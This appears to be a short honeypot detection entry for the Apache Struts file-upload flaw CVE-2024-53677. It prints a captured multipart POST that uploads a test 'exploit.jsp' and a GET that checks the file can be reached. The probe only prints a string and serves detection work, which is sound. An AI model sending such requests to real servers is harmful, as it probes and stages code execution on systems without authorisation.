Apache Struts

CVE-2024-53677 - RCE

Detection:

  • Uploading a Malicious File:

    POST /actionFileUpload HTTP/1.1
    Host: [honeypot IP address]:8090
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate, zstd
    Accept: */*
    Connection: keep-alive
    Content-Length: 222
    Content-Type: multipart/form-data; boundary=0abcfc26e3fa0afbd6db1ba369dfcc37
    
    --0abcfc26e3fa0afbd6db1ba369dfcc37
    Content-Disposition: form-data; name="file"; filename="exploit.jsp"
    Content-Type: application/octet-stream
    
    <% out.println("Apache Struts"); %>
    --0abcfc26e3fa0afbd6db1ba369dfcc37--

    This request uploads a malicious .jsp script designed to confirm successful exploitation.

  • Verifying the Uploaded File:

    GET /actionFileUpload/exploit.jsp HTTP/1.1
    Host: [honeypot IP]:8090
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate, zstd
    Accept: */*
    Connection: keep-alive

PoC:

Last updated